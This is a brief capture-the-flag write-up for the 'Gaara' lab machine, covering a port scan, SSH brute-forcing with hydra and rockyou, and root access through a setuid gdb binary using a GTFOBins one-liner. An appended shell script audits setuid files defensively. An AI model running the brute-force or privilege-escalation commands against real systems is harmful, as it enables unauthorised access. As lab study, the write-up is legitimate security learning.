Gaara
192.168.1.146
Port Scan
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
Nothing too interesting with the webserver, so I opted to brute-force SSH.
hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.1.146 ssh
Found an interesting base64-encoded clue
decoded:
The clue points to this file, which seems to contain some encrypted data:
I couldn't figure out what cipher (if any) this is encrypted with. I also wasn't understanding the clues, but they appear to be based on the show Naruto.
Linpeas finds an SUID
GTFOBins makes this easy
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
root flag
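For the defensive side of the SUID gdb finding above, here is an added example that is not part of the original write-up: a POSIX shell audit that lists setuid files and flags debuggers, interpreters and shells. The name patterns are an illustrative, non-exhaustive assumption, and the demo tree is constructed.

```shell
#!/bin/sh
# Added example: audit directories for setuid files and flag the ones that
# can run arbitrary commands (debuggers, interpreters, shells).

# audit_suid DIR...
# Prints "FLAG <owner> <path>" for setuid files whose name matches the
# pattern list below and "INFO <owner> <path>" for every other setuid file.
# Exit status: 1 if at least one file was flagged, otherwise 0.
audit_suid() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null | (
        flagged=0
        while IFS= read -r path; do
            name=${path##*/}
            owner=$(ls -ld "$path" | awk '{print $3}')
            case "$name" in
                # Illustrative pattern list (assumption, not exhaustive).
                gdb|python*|perl*|ruby*|lua*|bash|dash|sh|vim*|find|env|awk|gawk|mawk)
                    echo "FLAG $owner $path"; flagged=1 ;;
                *)
                    echo "INFO $owner $path" ;;
            esac
        done
        exit "$flagged"
    )
}

# Demo on a constructed tree, so nothing on the real system is touched.
demo_dir=$(mktemp -d)
: > "$demo_dir/gdb";     chmod 4755 "$demo_dir/gdb"      # setuid debugger
: > "$demo_dir/passwd";  chmod 4755 "$demo_dir/passwd"   # setuid, not matched
: > "$demo_dir/python3"; chmod 0755 "$demo_dir/python3"  # matched name, no setuid
audit_suid "$demo_dir" || echo "setuid files matching the pattern list were found"
rm -rf "$demo_dir"
```

On a real host, point it at the binary directories (for example `audit_suid /usr/bin /usr/local/bin`) and clear the bit on anything flagged with `chmod u-s <path>`.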